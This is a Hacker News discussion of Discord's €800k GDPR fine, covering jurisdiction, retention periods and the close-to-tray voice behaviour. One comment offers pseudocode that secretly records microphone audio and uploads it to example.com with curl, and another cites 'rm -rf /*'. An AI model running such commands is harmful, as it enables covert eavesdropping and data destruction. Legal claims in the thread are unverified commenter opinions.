17 ms·
Discord fined €800k for failing to comply with several obligations of the GDPR
- keewee7 4y agoI'm an EU citizen and support the GDPR. But it's only a question of time before the US will interpet these fines as an undeclared trade war and make up the legal framework to do retaliatory strikes against EU tech companies. Borders and tariffs will be the long-term future of the Internet.
- matkoniecz 4y agoGiven that EU companies are also getting fines, not only foreign ones, this interpretation would be silly.
- judge2020 4y agoThe real trade war is all of the Cloud act chicanery https://news.ycombinator.com/item?id=33562182 https://news.ycombinator.com/item?id=33562182 I should clarify that anyone under fire regarding Schrems II either needs to convince an EU member state's court that the Cloud Act is unlikely to result in GDPR data protection issues, or that the US has no way of obtaining that information in the first place (eg. no US corporation or persons have access to EU citizen data).
- caskstrength 4y agoI guess their assumption is that US wouldn't have that many options whom to retaliate to. Who would they fine? Spotify, maybe? Who else?
- kome 4y agoGood. More borders and tariffs (AND TAXATION, let me add) are definitely needed. Internet should contribute to a greater good, not enable transnational companies, tax evasion and data thief.
- Hamuko 4y agoIf regulating foreign companies is an undeclared trade war, could the US government please give Volkswagen its billions of dollars back?
- Barrin92 4y agoIf the US choses to interpret the GDPR that way, despite the fact that some significant receivers of fines are European itself (like H&M, Vodafone, two Italian energy and telecoms, Marriott and British Airways) then that would just show that American tech is an extended arm of the American government and in that case we should prioritize our sovereignty in the EU.
- ncallaway 4y agoEh, maybe, but also maybe not. Five states have passed their own privacy laws, with one in effect now and others coming online soon. If this practice continues, and it likely will, it will soon becoming completely unmanageable for US tech companies to keep up with the myriad of state privacy laws. At that point the federal government will likely pass a federal privacy law, which supersedes all the state privacy laws. And once we have a federal privacy law, it will likely be designed to at least be somewhat compatible with GDPR. So, I don’t see the US going to war over this issue. I think the political winds are drifting in the other direction, and the US will follow Europe on this. Eventually.
- gjadi 4y agoWell, the US has already a lot of restrictions to companies that want to do business in dollars and not just on Internet companies. See https://www.justice.gov/opa/pr/bnp-paribas-agrees-plead-guilty-and-pay-89-billion-illegally-processing-financial https://www.justice.gov/opa/pr/bnp-paribas-agrees-plead-guil... This is a case of trade with countries under embargo. One of the main use of internet surveillance was trade (e.g. Boeing vs. Airbus deals). I believe the US department of justice have the right structure to make this kind of fines, part of the fines goes to found the department of justice.
- Stranger43 4y agoThe GRPR is fully within the remits of existing trade agreements and does not violate US constitutional law, so as long as the EU is not selectively targeting US companies(and there is no evidence of that being the case), it's going to take a lot of crazy politicians and some tearing up of bilateral trade and cooperation agreements for the American authorities to take any action other then assisting the EU in collecting fines from American companies. There nothing new about companies enforcing their existing laws on imported goods and services and the eu-us free trade agreement's already contains clauses where both parties have to assist each other if a company is trying to evade those rules. The only thing new is that the regulators are now considering digital services to cross the border when there is money flowing the other way. If the US were going to raise a stink they would have done so when the EU kept doubling MS antitrust fine until MS eventually paid up, issuing GDPR fines to discord that is smaller then what smaller European companies have been fined ain't going to be an issue for the trans Atlantic trade relationships. Especially as GDPR style rules are being proposed at the state level in the US. Region locking of copyrighted material is where the real blocks in content is going to come into play(as it already have) but that is a whole different can of mud.
- theCrowing 4y agoSorry but the points are totally valid. If you delete your account your messages are still available with a userid that if someone has it can be traced back to you. They also don't delete files or pictures you uploaded alone for this they should get fined.
- izzydata 4y agoNot only should they get fined. They should also fix the problem.
- pimterry 4y agoYep, that's typically how this works - there's a small immediate fine for the current issues, but there'll be rapidly increasing fines in future if the issues continue beyond a reasonable timeframe to get this fixed.
- maeln 4y agoThey did. The CNIL did several control and verified that they indeed fixed the issues.
- Spivak 4y agoBut it’s a chat application, those messages aren’t owned by just the user that authored them. Even if a user deletes their account I should be able to go back in my chat history and find their messages and know it was them. It would be stupid if someone closing their cellular account would somehow reach into my phone and delete their contact, their messages, and replace their phone number with all zeros and this is semantically the same, the implementation shouldn’t matter. If you send a message to a group chat those messages are now owned collectively by the group and individually by each member, the gpdr is forcing companies to delete my data because someone else asked to delete theirs.
- lzooz 4y agoI agree with you in principle and I think that the EU is basically extorting American companies, but in your example all that information is stored in your phone, while in this case the information is stored in Discord's servers.
- pimterry 4y agoSomething worth noting that a lot of comments are ignoring here: while this fine is coming from the EU, these kinds of data protection rules are _everywhere_ now - this is no longer really EU-specific. The reality is that it's not an US companies vs EU data protection law battle - it's US companies vs data protection laws in the comfortable majority of all other developed nations. The EU, UK, Switzerland, Canada, Brazil, Israel, South Korea, Argentina, Japan, New Zealand, Indonesia, Uraguay, etc, all have substantial data protection legislation. The EU has an published list of countries whose data protection laws are considered equivalent to GDPR: https://ec.europa.eu/info/law/law-topic/data-protection/international-dimension-data-protection/adequacy-decisions_en https://ec.europa.eu/info/law/law-topic/data-protection/inte... While it's the EU fining Discord in this case, presumably the equivalent laws in each of those countries would also come to similar conclusions everywhere else too (though so far it seems the EU has more political appetite and clout to press the issue). There's no world where Discord or other major US companies can pull out of the EU and keep following these practices, even if that was worthwhile. To avoid having to implement data protection practices, they'd have to drop the vast majority of all international users (and in Discord's case, https://www.similarweb.com/website/discordapp.com/#traffic https://www.similarweb.com/website/discordapp.com/#traffic suggests the US is currently <30% of their user base, so that's just not happening).
- phendrenad2 4y agoHave those other laws been enforced against Discord? Also, pulling out of one zone because they enforced (what you believe to be an onerous) a law against you is always valid, it'll make the others think hard about enforcing the law against you.
- balaga01 4y ago> it'll make the others think hard about enforcing the law against you. We are not talking about some high-security military stuff here, it's only a chat app. It might be a big part of your world, but I can guarantee you that if they try to pull that off nobody in any government would care. I am pretty sure of the contrary actually: that several governments in EU have dreams of getting rid of these platform, and that they can't do it because that would be illegal.
- bjt2n3904 4y agoSome questions I need answered, that have yet to be answered in the article, or the comments here: Does Discord have an officially established business presence in the EU? That is, do they have an office? Employees? Remote workers officially living in the EU? A business license of some sort? One of the large questions here, entirely separate from the validity of the technical issues is of jurisdiction, and the answers are extremely unsatisfying. Edit: Yes, I understand that the GDPR claims jurisdiction. But this isn't my question. My question is also not, "does Discord have customers in the EU", or even "...run servers located in the EU". My question is only, "does Discord have an established business in the EU?" I was unable to find an answer with a short search, and I'm unsure where to look.
- akuji1993 4y agoYou don't have to have a presence established in the EU to be under EU jurisdiction. Any european user makes you responsible to ensure GDPR rules for that user. So even if Discord had no presence in the entire EU, no office, no worker, no nothing, it doesn't absolve the company from staying within GDPR rules for their european users. Only way to get out of that problem is to block any user with a european IP, although even then you could have users using a VPN, not sure how this would handle before the law.
- cesarb 4y ago> You don't have to have a presence established in the EU to be under EU jurisdiction. Any european user makes you responsible to ensure GDPR rules for that user. That argument has always seemed recursive to me. The law that says "having an EU user means you are under EU jurisdiction" is an EU law, so for it to apply to you, you have to be under EU jurisdiction. What's the base case?
- oxplot 4y agoGDPR applies to any company that offers services to EU residents. It doesn’t matter if the company has any presence in the EU. Now, that means EU may not necessarily be able to force the company operating in a different country to pay up but if a company has any significant EU customer base, I assume they will play ball.
- phendrenad2 4y agoyawn Wake me up when they start imposing €800k fines on businesses that can't afford to pay. Right now, GDPR feels like a way to shake down large businesses for free money, not a serious law they want to impose for principled reasons.
- remram 4y agoDiscord fixed the issues so it works. I don't see the point of bigger fines unless the issues don't get fixed.
- phendrenad2 4y agoI don't think you understood my comment.
- izackp 4y agoWould GDPR still apply if discord stored all personal data on other p2p clients?
- Fradow 4y agoYes. GDPR is not focused on storage only, but on data handling as a whole. No matter where the data is stored, it's still collected and handled by Discord, thus they are responsible for what they do with it.
- sieabahlpark 4y ago
- olalonde 4y agoJust because I haven't logged in in two years doesn't mean I want my account deleted... And they get fined for putting the app in the tray when user click the X button? And because they accept 6 character passwords? Those regulations are insane.
- osener 4y agoI wonder how this is supposed to work with workplace apps such as Slack. Assume I am leaving my job and want my personal information removed from this third-party service (Slack). They say [1] "Primary Owners of a workspace or org must contact Slack to request deletion of a deactivated member's profile information.". What if I contact the "Primary Owner" before leaving my job and they ignore my request, or if I've already left and don't know how to contact them or who they are? Why can't I simply request that my personal information be removed from a completely third-party American company's database? I thought about this out loud before, and got the response "If you are using company account, company owns the data. The data produced during company time is company's property. Company has to request for deletion. Slack is right about it." That made makes me ask more questions: - Is my full name, birth date, telephone number, job and other details Slack collects company property? - Can they also sell this to other third parties, along with my social security number, which the company also collected during business hours? - Is Slack also free to sell this data to third parties? - Does GDPR protect your personal information ONLY if you gave it away during your free / unemployed time using your personally owned devices and ONLY to services you have admin access to? [1] https://slack.com/help/articles/360000360443-Delete-profile-information-from-Slack https://slack.com/help/articles/360000360443-Delete-profile-...
- Stranger43 4y agoYou could ask the local DPA to look at your former employer(and then sue them if they decide to ignore you). Companies have been fined for lax handling of employee data. Slack is likely trying to operate under one of the attempts to replace the invalidated "privacy shield" framework(the current attempt is summarized here https://www.tadpf.eu/ https://www.tadpf.eu/) for their European enterprise customers, and a part of this is having contracts prohibiting slack from handing out the data to any 3rd party, but your relationship here is with your former employer and not slack. the Schrems rulings is a bit of a problem for slack here but that's not because slack is necessarily violating the GDPR directly but because the US does not live up to EU's standards for what a modern democracy is allowed to subject people to to in terms of protection against "unreasonable search and seizure"(this term actually comes form the Fourth Amendment of the us constitution but somehow the US courts don't think it applies to foreign persons or digital records held by cloud companies).
- spiffytech 4y ago> the company has complied with this obligation under the GDPR during the procedure, as it now has a written data retention policy, which includes deleting accounts after two years of user inactivity I find this interpretation of the GDPR surprising. Reviewing article 5.1.e there isn't any mention of timelines or any other definition of "necessary". As a user, I wouldn't want my account blown away just because I haven't logged in for a while. If this was e.g., an advertiser I don't have a direct relationship with, then yeah, purge that data! But data retention is a core of my relationship with Discord, so I want that data kept around.
- lbriner 4y ago"..because I haven't logged in for a while". That is a misrepresentation of the ruling. 2.4 million accounts not used in the last 3 years. This isn't "a while" it is a reasonable amount of time for a company to assume that someone doesn't want you to keep their data any longer unless they still have some other relationship with you or have your consent to keep the data stored until you explicitly delete it. The regulations are to strike a balance between the needs of the business and the needs of the individual where the individual's privacy should generally win over the desires of the business.
- spiffytech 4y agoI don't feel it's misrepresentative because I've gone 2-3 year spans without logging into plenty of services, and I expected my data to be there when I returned. I've had companies email me saying "log in or we'll delete your inactive account". That's a compromise I can accept. This article doesn't specify whether Discord does this. I'm also curious whether that practice is required under the GDPR, which the article doesn't specify either.
- readsadhours 4y agoIt seems like they didn't even consider any of the real issues. Things like deleted messages appearing in requests for your data, leaving a chat (or deleting your account while you are in a chat) with a deleted user not deleting the messages and uploads even though nobody is supposed to be able to re-join it, people getting banned for using scripts to mass-delete their own posts and in some cases getting banned for manually deleting their own posts "too fast", "right to be forgotten" requests being ignored, etc.
- jerryzh 4y agoTheir only product is a software whose background process scanner can never be disabled. That's a red flag to me already.
- raverbashing 4y ago> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. > DISCORD's behavior is different and may lead to users being heard by other members in the voice room when they thought they had left. Yeah, that's bad I'm not such a big fan of password policies but 6 characters with no rate-limiting seems bad as well
- bovermyer 4y agoI'm not fond of regulatory agencies defining what constitutes an acceptable password policy. Also, regulatory agencies mandating UI designs - while in this case fairly innocuous - leaves a bad taste in my mouth.
- Hamuko 4y ago>Also, regulatory agencies mandating UI designs - while in this case fairly innocuous - leaves a bad taste in my mouth. There are probably a bunch of regulations that dictate on what is in your car's cabin and how they work.
- bovermyer 4y agoCars are tons of metal moving at very high speeds under manual control, so I can understand why that would need greater regulatory scrutiny.
- morjom 4y agoHow is this UI design? Wouldn't this fall under UX or just basic functionality? I press X, program close. If I want it minimized I press the minimize button.
- hombre_fatal 4y ago"X" hasn't meant end the process for over 20 years. In 2022, it could very well be the better choice for most users to not end a voice call just because they clicked the "X" to get rid of the window. Just like what Skype, other Voip services, and most chat services have done forever. This ruling is a bit disappointing.
- tl 4y ago> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. However, in Microsoft Windows, clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applications. Interesting this is considered [Microsoft] Discord's fault and not Microsoft Windows. I quit Discord with Cmd-Q, does Alt-F4 not do the right thing on Windows? The only popular program I know evil enough to override Cmd-Q is Chrome, and I blame Apple for the failing.
- deleted 4y ago[deleted]
- debugnik 4y ago> does Alt-F4 not do the right thing on Windows It usually closes the active window, but Discord does close the entire application for some reason.
- akersten 4y agoSomehow I missed the part of the "very easy to understand and straightforward GDPR" that prohibits this. I've been saying all along that this regulation is dangerously boundless, but I can't wait for someone to justify to me why this actually makes total sense.
- judge2020 4y ago> The only popular program I know evil enough to override Cmd-Q is Chrome, and I blame Apple for the failing. TBF I've been saved a few times from losing all my browser state by accidentally hitting cmd-Q.
- LoganDark 4y agoOn macOS, you can already close all windows without exiting an application, so Discord does not violate any established convention. (Clicking the red traffic-light close button does not usually close the entire app; Cmd+Q does.) On Windows, there is no concept of applications at all, only windows. Perhaps you can try to mess with processes, but there's not even any mechanism for activation of a process that would even allow it to begin to work in any way similar to macOS's model. So yes. Closing all windows, on Windows, is widely assumed to terminate the associated process. This is why apps like Thunderbird, for example, close entirely when you click the X, and only actually go to the system tray when you click minimize. Interestingly, with Discord on Windows, Alt+F4 completely closes the entire app. The close button is implemented by the webpage, however, and closes to the system tray instead of actually closing the window.
- Hikikomori 4y agoSeems insane, many apps keeps running with an icon visible in the notification area when exited like that. Discords icon also shows if you are in a voice channel.
- burkaman 4y agoIt's not just that the application keeps running, but the active voice call you're in stays connected and everyone can still hear you. That is definitely counterintuitive, I would at least expect a popup saying "did you mean to close the call, this is just minimizing it to the background" or something. Also, that's 1 of 5 issues.
- can16358p 4y ago
- oblio 4y agoDid you even read the article? C'mon, it's not hard, it's about 1 page long.
- knaekhoved 4y ago[flagged]
- can16358p 4y ago
- can16358p 4y ago[flagged]
- simion314 4y ago>if I made a hello world program in C, they'd find a clever way of fining me Last time I check Hello World do not contain any internet connection code, let me know an example of C hello world that grabs your microphone input then sends it over the internet. Probably would be a single Linux command line job.
- ahungry 4y agoSomething like: nohup arecord /tmp/audio & ; nohup while :; do curl -F'data=/tmp/audio' http://example.com; done & Untested pseudocode, but probably close - that's enough for a GDPR violation I guess? That it'd record unimpeded while running in the background, and sending the output elsewhere? Pretty stupid scenario - sad Discord had locations in that area, because I agree with a lot of other posters, it seems to just be a weaponized law for monetary gain.
- matkoniecz 4y ago> that's enough for a GDPR violation I guess? No, you would also need to run on computers of people not understanding what is going on. In the same way as running > rm -rf /* on computers of people not understanding what is going on (or not agreeing to it) and where you are not allowed to do so is illegal, for quite good reasons.
- ahungry 4y agoDid the users choose to install the Discord app (or run a random command?) How are you supposed to confirm "user understanding"? Does the program need to require a tutorial/training before it's being used? A user's ignorance shouldn't be a software distributor's problem. If the discord app didn't have a system tray, and hid it's process from the Process List someway, maybe you have a point - this is just ignorance across the board.
- origin_path 4y agoDoes Discord even have a corporate presence in the EU? For the French government to be fining companies because they happen to dislike the UI is such a random and unpredictable decision that it seems like a strong signal for US firms to not set up offices in the EU at all.
- FamosoRandom 4y agoit's not so simple as "disliking the UI", it's about the UI/UX being clear enough that the user understand what he is doing in order to not be harmed by it in any way (disclosing personnal information for instance). Simply imagine that the user thought that, by clicking the "X" button, he closed the app and got off the vocal channel so that now nobody can hear him. Now a close relative ask him some other personnal info that he don't want to share (Health info, credit card etc..), and other people in the vocal channel hear it. Well, the user has been harmed. So yeah, not about "disliking the UI" but about protecting you, the user
- debugnik 4y ago> Simply imagine that the user thought that, by clicking the "X" button, he closed the app Do most users think that, though? I remember chat apps minimising to the tray bar since MSN Messenger and Skype, possibly earlier, and it's a common feature in most current ones, as well as in other applications. Now, it's true that some other chat apps display a floating panel to remind you that you're still in voice chat, but Discord's target audience is videogame players that don't want their media covered by such panel anyway, and most other chat apps let you close or disable such panel as well. Game consoles don't do so either. I agree with the other points in the case, but this UX design being a GDPR issue makes it clear these people are out of touch with the market.
- FamosoRandom 4y agoLook at your web browser. If you click on the "x" on a open tab, it will most likely close it. If you click on the "x" on your browser, it will close the browser, maybe will it alert you that you're going to close many things. Open Microsoft Excel or Microsoft Word, Notepad, your Windows file explorer, same thing. Those are probably the most used app in the world, so people will assume that it is what the "x" button does.
- femboy 4y agoProps to the EU for keeping data giants accountable. It is a shame the data protection authorities only have resources to process so many companies, unfortunately, many get away with much more harm to user privacy.
- InCityDreams 4y agoEach country also has it's 'in house' version, that prosecute various offenders on a local/ their-national level.
- yreg 4y agoIn this case the fine has nothing to do with keeping data secured.
- femboy 4y ago1. Failure to define and respect a data retention period appropriate to the purpose 2. Failure to comply with the obligation to provide information 3. Failure to ensure the security of personal data 4. Failure to carry out a data protection impact assessment While not a direct security breach investigation, these have high impact on user data. (edit: formatting)
- wincy 4y agoSo if I’m an American company and have no offices in Europe and ignore GDPR for my free customers, what happens? Will I get arrested by the Polizei when I land in Berlin? Will the US force me to pay these fines?
- femboy 4y agoYes, the European Commission will collaborate with international governments to impose fines.
- knaekhoved 4y agoWhich international governments? Why would the US agree to impose an EU fine, and under what legal basis?
- akuji1993 4y agoWhy would European countries extradite american criminals to the US? Because we established a trust in each other and want to keep it that way for both sides benefits.
- eldaisfish 4y agothis is a poor comparison. Extradition treaties exist and contain specific legal obligations. It is not based on trust and there are several pairs of countries that do not have specific extradition treaties.
- xphx 4y ago> treaties [...] not based on trust How are these treaties enforced? All international treaties are ultimately based on trust. There is no higher authority, only elective councils of and voluntary commitment to procedures (a.k.a. promises) by sovereign states. Specifically not even these formal promises have been given by e.g. the United States of America which to this day has signed but never ratified either the VCLT[1] or the VCLTIO[2], so is figuratively giving a lukewarm "let's see about the convenience of that when it comes up". 1: https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_of_Treaties https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_o... 2: https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_of_Treaties_between_States_and_International_Organizations_or_Between_International_Organizations https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_o...